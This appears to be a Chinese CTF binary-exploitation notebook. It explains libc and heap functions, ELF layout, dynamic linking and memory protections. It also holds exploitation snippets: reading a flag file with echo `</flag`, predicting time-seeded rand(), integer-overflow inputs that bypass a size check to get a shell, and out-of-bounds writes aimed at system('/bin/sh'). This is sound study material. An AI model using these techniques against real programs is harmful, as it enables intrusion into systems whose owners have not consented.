atoi(&buf); //将 buf 中的字符串转换为整数
getchar(); // 从标准输入读取一个字符,将其作为无符号字符强制转换为int返回
// getchar()在scanf()前,则scanf时将需要多加一个字节
__isoc99_scanf("%[^\n]s", v); // 表示输入直到回车
scanf("%d", &array[i]); // 当传入+或-时会跳过scanf不改变该数组中的值
strcmp(v1, v2); // 注意观察值可能在某处可泄露
strlen(s); // 字符串长度,直到空字符,不包含\0
s = strtok(a, " "); // 将a字符串按" "分割返回第一个子字符串
int execve(const char *__path, char *const __argv[], char *const __envp[]);
// glibc包装了execl(),execlp(),execle(),execv(),execvp()5个exec API, 参数区别, 最终还是execve()
qmemcpy(dest_memory, source_data, size); // 将size大小的源数据放入目标内存中
|
堆相关
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
void *malloc(size_t size);
/*
malloc: memory allocation 分配一块至少为size字节的连续内存区域, 返回一个指向该内存的指针
n=0时返回当前系统允许的堆的最小内存块
n<0时由于size_t无符号数, 申请很大内存空间, 一般会失败
*/
void *calloc(size_t nmemb, size_t size);
/*
calloc: 动态分配内存并初始化其内容为零, 分配nmemb个元素, 每个大小size字节
清空chunk上内容,且不从tcache中拿chunk,但free默认先往tcache放
*/
void *realloc(void *ptr, size_t size);
/*
realloc: 重新分配之前通过malloc/calloc/realloc分配的内存区域,可以改变内存块大小,释放和分配内存块
ptr指向内存块,size为新内存块大小
ptr不为空,size=0: 释放原来的堆块, 等价于free
ptr为空,size>0: 等价于malloc
ptr不为空,size大于原来堆块大小: 若该堆块后的堆块空闲则合并堆块,否则释放原堆块,申请一个更大堆块,原堆块内容拷贝过去
ptr不为空,size不大于原来堆块大小: 若切割后剩下堆块大于等于MINSIZE,则切割并释放,返回原堆块
*/
void free(void *ptr);
/*
释放ptr指向的内存块,ptr为空指针,不执行任何操作;ptr已被释放,再释放导致double free
*/
int mallopt(int param, int value);
/*
控制堆的特定参数来改变堆分配策略
param:
- M_MXFAST: 设置 malloc 用于小块内存分配的最大 fast bin 大小
- M_TRIM_THRESHOLD: 设置 sbrk 释放内存回操作系统的阈值
- M_TOP_PAD: 设置 sbrk 请求额外内存时,上面的额外内存量
- M_MMAP_THRESHOLD: 设置使用 mmap 进行内存分配的阈值
- M_MMAP_MAX: 设置可以使用 mmap 进行内存分配的最大数目
value: 新值
返回非0:成功, 0:失败
*/
|
mmap
1
2
3
4
5
6
7
8
9
10
11
12
13
|
// 文件或设备的内容映射到内存地址空间 或 分配匿名共享内存
void *mmap(void addr[.length], size_t length, int prot, int flags,int fd, off_t offset);
// addr: 映射的起始地址, 传入NULL则OS自动选择
// length: 映射长度, 单位: 字节
// prot: 映射内存的保护模式 PROT_READ 1读 PROT_WRITE 2写 PROT_EXEC 4执行
// flags : 映射的类型, 对映射同一区域的其他进程是否可见
// fd: 文件描述符, 0,-1表示匿名映射: 通常用于分配内存
// offset: 文件偏移量, 从文件该位置开始映射
// 使用 mmap 分配内存 需要用对应的标志的值进行异或! https://sites.uclouvain.be/SystInfo/usr/include/bits/mman.h.html
void *mapped_memory = mmap(NULL, file_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
// 文件映射到内存, mapped为指向该映射内存地址起点的指针, 失败则返回MAP_FAILED(-1)
void *mapped = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
|
C++
1
2
3
|
vptr = operator new(std::size_t size); // 不调用构造函数,仅分配内存空间
std::string::basic_string(input); // 将input初始化为string对象
std::ostream::operator<<(xxx); // 写入ostream
|
文件
1
2
3
4
5
6
|
std::ofstream::basic_ofstream(); // 创建文件输出流, 写入文件
std::ofstream::is_open("xxx"); // 判断是否打开文件
std::ifstream::basic_ifstream(v, "xx", 8LL); // 打开文件
if ( !std::ifstream::is_open(v) ) // 判断是否打开
std::istream::operator>>(v, a); // 将文件内容读取到内存地址a中
|
虚函数
1
2
3
4
5
6
7
8
9
10
11
12
13
|
// 虚函数占用类A对象内存空间
class A{
public:
// void *vptr; // 虚函数表指针
virtual void vfunc(){}
virtual ~A(){}
A(){
vptr = &A::vftable; // 编译阶段自动为构造函数加入, 使vptr指向类A的虚函数表virtual table
}
private:
int a;
};
|
Python
小的匿名函数
1
2
|
xx = lambda arg1,arg2:expression
xx(x1,x2)
|
解释器
1
2
3
4
|
# 开头
#!/usr/local/bin/python
or
#!/usr/bin/env python
|
调试器
1
2
3
|
python -m ipdb x.py
# l: 显示所有代码 s: 单步调试 restart: 重启 c: 继续 q: 退出 b num: 下断点到 num 行
# p variable 查看变量值 p locals() 返回所有值的字典
|
检测器
1
2
|
pyflakes <file.py> # 可以检查错误
mypy <file.py> # 静态类型检查器
|
性能分析
1
2
|
python -m cProfile -s tottime command.py # 使用cProfile分析, 总时间进行排序
python -m memory_profiler x.py # 查看代码内存使用情况
|
字节串
1
2
3
|
s.replace(b'a', b'c') # 字节串替换 a 替换为 c
str_s.decode('utf-8').strip('x') # 字节串转换为字符串, 并去除两端的'x'
eval(s_str) # 执行字符串中的运算式
|
保护措施
The NX bits
No-eXecute,编译时决定是否生效,操作系统实现,在内存页的标识中增加“执行”位,可表示该内存页是否可以执行——无法向栈写shellcode,栈不可执行,无法使用shellcode,可利用ROP绕过
ASLR
Address Space Layout Randomization:地址空间分布随机化,系统级别随机化,影响ELF的加载地址,使得地址每次加载都随机不同
程序装载时生效
/proc/sys/kernel/randomize_va_space = 0
:无随机化
/proc/sys/kernel/randomize_va_space = 1
:部分随机化,共享库、栈、mmap()、VDSO随机化
/proc/sys/kernel/randomize_va_space = 2
:完全随机化,部分随机化基础上,通过brk()
分配的堆内存空间也随机化
会在For Kernel下开始偏移随机的量,使得栈的起始地址随机
PIE
position-independent executable,地址无关可执行,每次加载程序时都变换加载地址,不开则加载到固定位置,针对主模块的随机,针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术
注:
区别
- 关闭 PIE
- 关闭 ASLR:主模块加载地址固定(0x400000)所有模块加载地址固定
- 开启 ASLR:主模块加载地址固定(0x400000) 其他模块加载地址不固定
- 开启 PIE
- 关闭 ASLR:所有模块加载地址固定 主模块地址(主模块基址 0x55xxxxxxxxxx且固定)
- 开启 ASLR:所有模块加载地址不固定
Canary
有canary栈溢出无法执行,在函数入口处从fs(32位)/gs(64位)寄存器偏移处读取一个值,实际读取TLS中的stack_guard
,IDA中可分析识别出canary
1
2
3
|
unsigned __int64 v4; // [rsp+108h] [rbp-20h]
v4 = __readfsqword(0x28u);//表示在栈上放置一个Canary
return __readfsqword(0x28u) ^ v4;//为0才会通过检查
|
return address |
|
previous ebp |
ebp |
canary |
执行ret前检查canary |
…… |
|
s |
esp |
若Canary值被改变,则会触发:__stack_chk_fail
函数
RELRO
(Relocation Read Only:重定位表(即.got和.plt表)只读)
No relro:got表可写,(init.array
、fini.array
、got.plt
均可读可写)
部分relro:got表可写,(ini.array
、fini.array
可读不可写,got.plt
可读可写)
完全relro:got表不可写,只读,无法被覆盖,大大增加程序启动时间(均不可写)
RWX
checksec查看可读可写可执行的区域:Has RWX segments
问题解决
- 报错:Unexpected entries in the PLT stub. The file might have been modified after linking
下载 https://github.com/veritas501/pltresolver 到plugins文件夹中,然后键盘输入 Ctrl+Shift+J
- 反汇编失败:Decompilation failure:8048998: call analysis failed
Edit - Patch program - Assemble
改为 nop
1
2
3
|
W: GPG 错误:https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease: 由于没有公钥,无法验证下列签名: NO_PUBKEY 3B4FE6ACC0B21F32
E: 仓库 “https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease” 没有数字签名。
N: 无法安全地用该源进行更新,所以默认禁用该源。
|
解决: sudo apt-key adv --keyserver ``keyserver.ubuntu.com`` --recv-keys 3B4FE6ACC0B21F32
ELF文件
Executable and Linking Format 可执行和链接的文件格式,其文件结构、常数、变量类型定义在/usr/include/elf.h
中
|
|
可执行程序 |
动态链接库 |
静态链接库 |
Windows |
PE |
.exe |
.dll |
.lib |
Linux |
ELF |
.out |
.so |
.a |
ELF文件类型
- 可执行文件
ET_EXEC
:可直接执行,在操作系统运行
- 共享目标文件
ET_DYN
:可被动态链接的共享库,运行时与其他程序动态链接,后缀.so
- 可重定位文件
ET_REL
:编译器生成的目标文件,用于将多个目标文件链接到一个可执行文件或共享库中,后缀.o
,静态链接库.a
也可归为该类
- 核心转储文件
ET_CORE
:操作系统在程序崩溃或错误生成的快照,用于调试
文件头ELF header
记录ELF文件组织结构,32位为例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
/* The ELF file header. This appears at the start of every ELF file. */
#define EI_NIDENT (16)
typedef struct
{
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
/*
1-4 bytes: ELFMAG即x7fELF
5 byte: ELF文件类型->ELFCLASS32(1)32位, ELFCLASS64(2)64位
6 byte: ELF字节序, 0无效格式, 1小端, 2大端
7 byte: ELF版本, 1即1.2版本
8-16 bytes: 无定义0
*/
Elf32_Half e_type; /* Object file type ELF 文件类型 */
Elf32_Half e_machine; /* Architecture EM_开头*/
Elf32_Word e_version; /* Object file version */
Elf32_Addr e_entry; /* Entry point virtual address 程序入口*/
/* RVA:内存中地址相对于模块基址的偏移; FOA:文件中某数据相对于文件开头的偏移 */
Elf32_Off e_phoff; /* Program header table file offset 程序头表的文件偏移*/
Elf32_Off e_shoff; /* Section header table file offset 节表的文件偏移*/
Elf32_Word e_flags; /* Processor-specific flags */
Elf32_Half e_ehsize; /* ELF header size in bytes ELF文件头大小*/
// 程序头表
Elf32_Half e_phentsize; /* Program header table entry size 每个表项大小*/
Elf32_Half e_phnum; /* Program header table entry count 表项数量*/
// 节表
Elf32_Half e_shentsize; /* Section header table entry size 每个表项大小*/
Elf32_Half e_shnum; /* Section header table entry count 表项数量*/
Elf32_Half e_shstrndx; /* Section header string table index 字符串表的索引*/
} Elf32_Ehdr;
|
程序头表Program header table
告诉系统如何创建进程,可执行文件、共享库文件有,目标文件没有,由Elf*_Phdr
组成的数组
1
2
3
4
5
6
7
8
9
10
11
12
|
/* Program segment header. */
typedef struct
{
Elf32_Word p_type; /* Segment type */
Elf32_Off p_offset; /* Segment file offset */
Elf32_Addr p_vaddr; /* Segment virtual address */
Elf32_Addr p_paddr; /* Segment physical address ELF还没装载不知道物理地址作为保留字段, 通常和p_vaddr一样*/
Elf32_Word p_filesz; /* Segment size in file */
Elf32_Word p_memsz; /* Segment size in memory */
Elf32_Word p_flags; /* Segment flags 可读可写可执行等*/
Elf32_Word p_align; /* Segment alignment */
} Elf32_Phdr;
|
节头表Section header table
记录ELF节区信息,用于链接的目标文件必须拥有此结构,固定长度的Elf*_Shdr
结构体数组用来存放节相关信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
/* Section header. */
typedef struct
{
Elf32_Word sh_name; /* Section name(string tbl index)节名在字符串表中索引*/
Elf32_Word sh_type; /* Section type 节类型*/
//SHT_PROGBITS(1)代码段, SHT_PROGBITS(2)数据段, SHT_SYMTAB(2)符号表, SHT_STRTAB(3)字符串表
Elf32_Word sh_flags; /* Section flags */
Elf32_Addr sh_addr; /* Section virtual addr at execution
指定了节在可执行文件内存中加载地址*/
Elf32_Off sh_offset; /* Section file offset 节在文件中偏移量*/
Elf32_Word sh_size; /* Section size in bytes 节大小*/
Elf32_Word sh_link; /* Link to another section */
Elf32_Word sh_info; /* Additional section information */
Elf32_Word sh_addralign; /* Section alignment */
Elf32_Word sh_entsize; /* Entry size if section holds table */
} Elf32_Shdr;
|
段(segment)与节(section)
- 段:用于进程的内存区域的rwx权限划分,在加载和执行时被OS来管理内存和地址映射,提供对应虚拟内存的逻辑映射
- 节:不参与内存的加载和执行,而用于链接器Linker和调试器Debugger对文件符号解析即重定位操作,提供对应文件的逻辑映射
- 代码段 Text Segment 包含函数代码与只读数据
.text
节:代码节,存储程序可执行指令
.rodata
节:read only只读数据节,只读常量
.hash
节
.dynsym
节
.dynstr
节
.plt
节(Procedure Linkage Table, 进程链接表):包含一些代码
- 调用链接器来解析某个外部函数的地址, 并填充到.got.plt中, 然后跳转到该函数
- 直接在.got.plt中查找并跳转到对应外部函数(如果已经填充过)
.rel.got
节
- 数据段 Data Segment 包含可读可写数据
.data
节:已初始化的全局变量、静态变量,占用文件实际内存空间
.dynamic
节:动态节,存储动态链接信息,包括动态链接器需要的重定位表位置、依赖的共享对象名称、共享对象初始化代码的地址、动态链接符号表的位置、版本信息等
.got
节
.got.plt
节(.plt的GOT全局偏移表):保存全局函数真实地址
- 如果在之前查找过该符号,内容为外部函数的具体地址
- 如果没查找过, 则内容为跳转回.plt的代码, 并执行查找
.bss
节:(Block Started by Symbol)未初始化的全局变量和静态变量,不占用文件实际内存空间,运行才分配空间初始化为0
- 栈段 Stack Segment
链接相关节
-
静态链接相关
.symtab
节:符号表节,存储符号表信息:函数、变量、其他符号的名称、类型、地址等
.strtab
节:字符串表节,存储字符串数据:节名称、符号名称,被多个其他节引用
.rel.text
或.rela.text
节:代码重定位节,链接时修正代码中符号引用
.rel.data
或.rela.data
节:数据重定位节,链接时修正数据段中符号引用
-
其他
-
动态链接相关
-
.interp
节:解释器interpreter,保存字符串/lib64/ld-linux-x86-64.so.2
,可执行文件所需动态链接器路径
-
.dynamic
节:由ELF*_Dyn
组成的结构体数组
-
.dynsym
节:动态符号表,由Elf*_Sym
构成的结构体数组,只保存与动态链接相关符号
- 同时拥有
.symtab
保存所有符号,辅助表:动态符号字符串表.dynstr
,符号哈希表.hash
-
.rel.dyn/.rel.data
节:动态链接重定位表,动态链接运行时才将导入符号的引用进行修正,共享对象重定位在装载时完成
三个ELF表
- PLT(Procedure Linkage Table):
elf.plt['system']
通常是用于调用共享库中函数的入口点。PLT 中的代码负责将控制转移到真正的函数地址,这是通过动态链接的方式实现的。因此,PLT 中的地址是一个入口点,负责实际跳转到共享库中的函数。
- 调用外部函数的一组跳转表,每个函数对应一个入口,包含可执行代码,覆盖返回地址为plt地址可最终跳转导向到got表中的函数地址处
- 未开启
FULL RELRO
,PLT 表在 .plt
- 开启
FULL RELRO
,PLT 表在 .plt.sec
:GOT 表装载时已完成重定位且不可写所以不存在延迟绑定,PLT 直接根据 GOT 表存储的函数地址进行跳转
- Symbol Table:
elf.symbols['system']
返回的是 ELF 文件中符号表中 system
函数的地址。这个地址是在编译时确定的,是链接时的静态地址。在编译时,链接器会将符号解析为实际的地址。
- GOT(Global Offset Table,全局偏移表):
elf.got['system']
返回的是 ELF 文件中的 GOT 表中 system
函数的入口地址。全局表存储外部函数或库函数真实地址,GOT 表中的地址是一个指针,指向共享库/动态链接器中的真实函数地址。在运行时,当程序第一次调用一个共享库中的函数时,PLT 中的代码会更新 GOT 表中的地址,将其设置为实际函数的地址
- 保存全局变量/外部符号地址
- 不用于直接调用,只保存了实际函数地址,不是可执行的指令,覆盖返回地址不用got表地址覆盖
- ELF 将 GOT 拆分成
.got
和 .got.plt
, .got
保存全局变量引用的地址,.got.plt
保存函数引用的地址
共享库
命名规则:libname.so.x.y.z
,xyz:主版本号、次版本号、发布版本号
SO-NAME
- 每个共享库都有一个对应的 SO-NAME,依赖某个共享库的模块在编译、链接和运行时使用共享库的 SO-NAME 而不使用详细版本号
- 系统会为每个共享库在它所在的目录创建一个跟 SO-NAME 相同的并且指向它的软链接(Symbol Link)
- 稍高版本的 libc 的
libc.so.6
本身就是动态库,不是符号链接,动态链接文件中 .dynamic
段中 DT_NEED
类型字段就是 SO-NAME
1
2
3
4
5
6
7
8
9
10
11
12
|
# 动态库
$ ls -l /lib/x86_64-linux-gnu/libc.so.6
lrwxrwxrwx 1 root root 12 May 1 2024 /lib/x86_64-linux-gnu/libc.so.6 -> libc-2.31.so # glibc 2.31
-rwxr-xr-x 1 root root 2029592 May 1 2024 /lib/x86_64-linux-gnu/libc-2.31.so
-rwxr-xr-x 1 root root 2125328 8月 8 22:47 /lib/x86_64-linux-gnu/libc.so.6 # glibc 2.39
# 动态链接器
$ ls -al /lib64/ld-linux-x86-64.so.2
lrwxrwxrwx 1 root root 32 May 1 2024 /lib64/ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.31.so
lrwxrwxrwx 1 root root 44 8月 8 22:47 /lib64/ld-linux-x86-64.so.2 -> ../lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
|
共享库系统路径
/lib
:包含OS核心组件所需共享库文件,与内核相关
/usr/lib
:包含OS提供的额外共享库文件,GUI、网络库、数据库驱动程序
/usr/local/lib
:安装本地软件库文件默认位置,用户手动编译安装软件
更改共享库
环境变量
LD_LIBRARY_PATH
:为进程设置,则启动时动态链接器会首先查找该环境变量指定的目录,会导致地址布局差异
1
|
sh = process("./lib/ld.so --preload libdl.so.2 ./pwn".split(), env={"LD_LIBRARY_PATH": "./lib/"})
|
LD_PRELOAD
:指定预先装载的共享库,无论是否依赖都装载,也会导致地址布局差异
1
|
process("./lib/ld.so ./pwn".split(), env={"LD_PRELOAD": "./lib/libc.so.6"})
|
进程
编译
广义编译包括:
链接
将多个目标文件及库文件生成最终可执行文件或共享库
静态链接
1
2
|
ld a.o b.o -o ab
gcc a.o b.o -o out.elf
|
合并代码和数据段
多个目标文件中代码段和数据段合并成一个
符号解析
- 链接器通过重定位表解析目标文件中包含的对其他目标文件或库中定义的符号引用,修复对应机器码
- 需要重定位的ELF都有对应重定位段,
.text
有.rel.text
,.data
有.rel.data
- 通过
Elf32_Rel
:
- ``r_offset`加上段起始得到重定位入口位置
r_info
低8位得重定位类型
r_info
高24位得到重定位符号在符号表.symtab
中的下标
符号重定位
Elf32_Rel
中st_value
表示符号在段中偏移,根据重定位类型计算入口需要修正的值并修正
- 32位常用重定位类型:
R_386_32
:绝对地址
R_386_PC32
:相对当前指令地址的下一条指令相对地址
解析库依赖关系
目标文件依赖于外部库(标准/第三方),将所需的库文件链接到最终可执行文件中
1
|
/lib/x86_64-linux-gnu/libc.a # 包含多个.o文件
|
生成重定位表
每次程序地址加载变化,需要生成重定位表,以便在可执行文件在加载和执行时进行正确的符号重定位
动态链接
运行时才链接
装载时重定位
加载时将模块中相关地址修改为正确的值,模块装载到不同位置会导致模块代码段内容改变,无法实现共享库复用,浪费内存
地址无关代码(PIC, Position-independent Code)
把指令中那些需要被修改的部分分离,与数据部分放一起,指令部分保持不变,数据部分每个进程拥有一个副本
- 模块内部函数调用、数据访问:
[rip + xxx]
实现引用
- 模块间函数调用、数据访问:数据段建立一个指向变量的指针数组全局偏移表(Global Offset Table, GOT),
- 共享模块被加载,若某全局变量在可执行文件中拥有副本,动态链接器把GOT中相应地址指向该副本,若变量在共享模块被初始化,动态链接器需将该初始化值复制到程序主模块中的变量副本
- 若该全局变量在主模块中无副本,GOT相应地址指向共享模块内部的该变量副本
延迟绑定
.text
节中调用libc动态链接库中puts函数call puts@plt
,取代码段中.plt
节(plt表中每一项是一个调用函数的表项)
首次调用puts函数
- 跳转到
.plt
中puts表项
- 【
jmp *(puts@GOT)
】跳转到.got.plt
中记录的地址
.got.plt
未解析该函数地址,存的是.plt
对应函数地址【puts@plt+"1"/6
】,跳回.plt
中
- 执行【
push index
】和【jmp PLT0
】,index是puts在plt表中对应索引
- 跳转到PLT0执行【
push *(GOT+4)
】,表示用到哪个动态链接库link_map
,执行【jmp *(GOT+8)
】跳到GOT表
- 进入
_dl_runtime_resolve
函数解析puts函数实际地址
- 用第一个参数
link_map
访问.dynamic
,取出.dynstr, .dynsym, .rel.plt
指针,分别运算求出符号名字符串指针、当前符号表项指针、当前函数重定位表项指针
- 动态链接库查找该函数地址
- 填入到
.got.plt
中
- 调用puts函数
再次调用puts函数
- 跳转到
.plt
中puts表项
- 跳转到
.got.plt
- 从
.got.plt
跳转到puts
真实地址
动态链接过程
- 动态链接器自举:自身重定位,OS将进程控制权交给动态链接器,自举代码找自己的GOT,第一个入口即为
.dynamic
段,获取本身的重定位表和符号表,进行重定位
- 装载共享对象:动态链接器将可执行文件和本身符号表合并为全局符号表,然后寻找共享对象,将其名字放入装载集合中,找到相应文件读取ELF文件头和
.dynamic
段的相应代码段和数据段映射到进程空间
- 重定位和初始化:重新遍历可执行文件和每个共享对象的重定位表,修正GOT/PLT中位置;若共享对象有
.init
段,动态链接器执行实现对象中C++全局/静态对象构造初始化,.fini
段用于进程退出实现C++全局对象析构操作,不执行进程可执行文件的.init
段
装载
- 输入
./elf
,用户层bash进程调用fork()
系统调用创建新进程,新进程调用execve()
系统调用执行elf文件,以全新程序替代当前运行程序;原先bash进程返回等待新进程结束后,继续等待用户命令
- 内核开始装载,
execve()
对应入口是sys_execve()
检查参数
- 调用
do_execve()
查找被执行文件,找到后读取前128字节判断文件格式,头4个字节为魔数:ELF头x7felf
,Java可执行文件头cafe
,Shell/python等解释型语言第一行#!/bin/sh
或#!/usr/bin/python
- 调用
search_binary_handle
搜索匹配合适可执行文件装载处理过程并调用:ELF
可执行文件对应load_elf_binary()
,a.out
可执行文件对应load_aout_binary
,可执行脚本程序对应load_script
- 检查ELF文件格式有效性:魔数、段数量
- 找动态链接的
.interp
段设置动态链接器路径
- 根据程序头表,对ELF进行映射:代码、数据、只读数据
- 初始化进程环境
- 系统调用返回地址修改为ELF入口地址【静态链接入口是文件头
e_entry
所指地址;动态链接入口是动态链接器ld】
load_XX
函数执行完毕返回最初sys_execve()
返回用户态,EIP寄存器跳转到ELF程序入口地址,执行新程序
执行
初始化栈
- OS在进程启动前将系统环境变量和进程运行参数提前保存在进程虚拟空间栈中,静态程序
_start
处寄存器基本为0,动态程序寄存器大多为垃圾数据
-
rsp指向命令行参数个数【argc】
-
指向各个命令行参数字符串的指针数组【argv】,以0结尾
-
指向环境变量字符串的指针数组【envp】,以0结尾
-
辅助向量信息数组:OS将其提供给动态链接器
1
2
3
4
5
6
7
|
typedef struct{
uint32_t a_type; /* Entry type 辅助向量的条目类型 */
// 可执行文件文件描述符,程序头表地址及每个条目大小、条目数量,页面大小,共享对象基址,OS标志位,程序入口地址
union{
uint32_t a_val; /* Integer value 辅助向量的值 */
} a_un;
} Elf32_auxv_t;
|
-
运行程序时,shell 调用 linux 系统调用 execve()
设置一个堆栈,将 argc
、 argv
和 envp
压入其中
-
文件描述 0、1 和 2(stdin
、stdout
、stderr
)保留为 shell 设置的值,动态链接器完成重定位工作
-
调用 _start()
设置 ___libc_start_main
函数所需参数
-
1
2
3
4
5
6
7
8
|
STATIC int
LIBC_START_MAIN (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL), // main函数
int argc,
char **argv,
__typeof (main) init, // main 调用前的初始化工作, 默认是 __libc_csu_init 函数指针
void (*fini) (void), // main 结束后的收尾工作, 默认是 __libc_csu_fini 函数指针
void (*rtld_fini) (void), // 动态加载有关的收尾工作, 动态链接默认是 _dl_fini 函数指针
void *stack_end) // 栈底的地址
|
__libc_start_main:csu/libc-start.c
中
__libc_csu_init: csu/elf-init.c
中
linux程序执行流程:
内核执行过程:sys_execve()
-> do_execve_common()
-> search_binary_handler()
-> load_elf_binary()
-> create_elf_tables()
,create_elf_tables()
会添加辅助向量条目
1
2
3
4
5
6
|
NEW_AUX_ENT(AT_PAGESZ, ELF_EXEC_PAGESIZE);
NEW_AUX_ENT(AT_PHDR, load_addr + exec->e_phoff);
NEW_AUX_ENT(AT_PHENT, sizeof(struct elf_phdr));
NEW_AUX_ENT(AT_PHNUM, exec->e_phnum);
NEW_AUX_ENT(AT_BASE, interp_load_addr);
NEW_AUX_ENT(AT_ENTRY, exec->e_entry);
|
虚拟空间
虚拟内存mmap段中的动态链接库仅在物理内存中装载一份
- 每个进程有自己虚拟地址空间,由连续虚拟地址组成,不直接访问物理内存地址
- OS将其分为多个区域【代码段:可执行程序机器指令;数据段:静态及全局变量
.bss .data ...
;动态链接段】
- 加载器将这些短从ELF文件复制到相应虚拟内存地址,通过页表建立虚拟和物理内存地址映射关系
TLS结构体
线程可访问进程内存所有数据,全局变量若用__thread
修饰则为线程私有的TLS数据,即每个线程都在自己所属TLS中单独存一份该变量副本
私有数据:局部变量、函数参数、TLS数据(线程局部存储Thread Local Storage)
共享数据:全局变量、堆上数据、函数中静态变量、程序代码、打开文件
.tdata
节记录已初始化的 TLS 数据;.tbss
节记录未初始化的 TLS 数据,ELF中不占空间
- 2节加载到内存中合并为一个段程序头表中这个段的
p_type
为 PT_TLS(7)
每一个线程中每一个使用了 TLS 功能的模块都拥有一个 TLS Block,dtv
数组中的每一项都是 TLS Block 的入口,程序使用 dlopen
函数或者 dlfree
函数加载或者卸载一个具备 TLS 变量的模块
主线程TLS初始化: main
开始前调用 __libc_setup_tls
初始化 TLS,遍历找到段调用brk
为TLS数据和pthread
结构体分配内存,然后初始化dtv
数组,
创建线程时TLS初始化:pthread_create
调用 __pthread_create_2_1
函数,该函数中调用allocate_stack
中的mmap
为线程分配栈空间,初始化栈底为一个 pthread
结构体并将指针 pd
指向该结构体。最后调用 _dl_allocate_tls
函数为 TCB 创建 dtv
数组, fs 寄存器不能在用户态修改
终端处理
① 只有echo
命令
1
|
echo `</flag` # 将``包裹的子命令 /flag 内容输出到 echo 中读出
|
② linux存在一些内置命令:cd, echo, read, pwd, source
,若没有cat
等,可以通过以下代码在shell直接逐行查看文件内容
1
2
3
|
while IFS= read -r line; do
echo "$line"
done < filename
|
③ 当使用rm
删除某个文件后,可通过以下方法恢复
1
2
3
4
5
6
7
8
9
|
lsof | grep deletefile # 找到进程
cp /proc/self/fd/1 ~/deletefile.backup # self表示当前进程
[root@docking ~]# cd /proc/21796/fd
[root@docking fd]# ll
总用量 0
lrwx------ 1 root root 64 1月 18 22:21 0 -> /dev/pts/0
l-wx------ 1 root root 64 1月 18 22:21 1 -> /root/deletefile.txt (deleted)
lrwx------ 1 root root 64 1月 18 22:21 2 -> /dev/pts/0
|
④ 退格键应用
1
2
3
|
with open("a", "wb") as f:
f.write(b'abcdefg\x08\x08')
# \x08为退格键即backspace, 在linux中使用cat a时将只会读出abcde
|
随机数
random
1
2
3
4
5
6
7
8
9
|
time_t timer;
struct tm *v3;
int secret;
timer = time(0LL); // 当前时间
v3 = localtime(&timer);
srandom(v3->tm_yday); // 设置种子 为tm结构中的yday
secret = random() // 种子数相同,多次得到的随机值相同
|
利用当前时间戳进行预测
1
2
3
4
5
6
7
|
from ctypes import cdll
import time
clib = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
seed = int(time.time())
clib.srand(seed)
pwd = clib.rand()
|
/dev/random
1
2
3
4
|
// 基于物理设备噪声熵值 真随机 熵池不足会阻塞
random_file = fopen("/dev/random", "rb"); // 打开系统/dev/random设备
fread(&secret, 4uLL, 1uLL, random_file); // 读 1 个 4 字节的数据块,存入secret地址中
fclose(random_file);
|
arc4random
1
2
3
|
// 基于 ARC4(Alleged RC4) 加密算法实现高质量伪随机数 无符号32位随机整数
// 操作系统中不显式初始化种子
secret = (unsigned int)arc4random()
|
若有循环函数及模数可以进行爆破
1
2
3
4
5
6
|
for i in range(num):
num = i
io.sendline(str(num))
result = io.recvline()
if b"xxx" in result:
break
|
整数溢出漏洞
下标溢出(越界):程序未规定上下界,数字溢出,导致可以访问线性地址上内容
1
2
|
__isoc99_scanf("%u", &v1); // 未限制下标
now = (__int64)&saves[8 * v1]; // 将saves数组外地址加载入now, 若能对now指向地址更改可任意地址写
|
漏洞点:
1
2
3
4
|
int len;
char buf[0x100];
scanf("%d", &len);
read(0, buf, (unsigned int)len); // len转换为无符号整型, 则输入-1可以向buf输入极大数量的值
|
1
2
|
__isoc99_scanf("%d", &v4);
read(0, *((void **)&record + v4), 0x80uLL); // 通过构造v4进行任意地址写
|
memcpy绕过
计算机中用补码存储有符号数,正数就是原码,负数需按位取反加一
1
2
3
4
5
6
7
8
9
|
_isoc99_scanf((unsigned int)"%d", (unsigned int)&size);
if ( size )
{
if ( size > 16 )
puts("Number out of range!");
else
memcpy(v, &buf, size); # memcpy中的size 为 size_t
# typedef unsigned long size_t; 即无符号整数
}
|
调试发现比较代码为:
1
|
cmp eax, 10h # eax为32位 且此时将eax作为有符号整数看
|
计组知识
通过构造size为【作为有符号数是负数,作为无符号数为一个极大数】
输入 |
rax |
eax |
有符号比较 |
无符号复制 |
|
-1 |
FFFF FFFF FFFF FFFF |
FFFF FFFF |
-1 < 16 |
|
绕过但崩溃 |
-23923 |
FFFF FFFF FFFF A28D |
FFFF A28D |
-23923 < 16 |
|
绕过getshell |
4294967200 |
0000 0000 FFFF FFA0 |
FFFF FFA0 |
-96 < 16 |
|
绕过getshell |
-2147483896 |
FFFF FFFF 7FFF FF08 |
7FFF FF08(第一位为0表正数) |
2147483400 > 16 |
|
未绕过崩溃 |
【调试方法】
根据相应汇编看寄存器的变化值,然后逆向使用python进行相反运算获取对应十六进制值再转换为十进制,最终可以根据调试构造出所需要的size大小,进而若有可控制的数组偏移如下,即可利用更改内存值
OOB漏洞
Out-of-Bounds,包括数组越界、指针偏移、使用后释放UAF等
写后判断
通过该漏洞可以造成越界写内容,若arg_list在bss段可以借此越界改其他bss段上的变量
1
2
3
4
5
6
7
8
9
10
|
while ( 1 ){
next_args = strtok(0LL, " "); // 获取命令行输入参数遍历
if ( !next_args ) break;
if ( strlen(next_args) > 31 ){return -1;}
i = nargs++;
strcpy(&arg_list[32 * i], next_args); // 漏洞点: 先写入arg_list再判断是否大于10
}
if ( nargs <= 10 ){ return idx;}
else{return -1;}
|
调用越界
- 先任意写入system地址到bss段,尝试越界修改bss段中idx使得偏移调用system函数
arg_list
也可尝试任意地址写入'/bin/sh'
- 注意有时
p64(0xab)
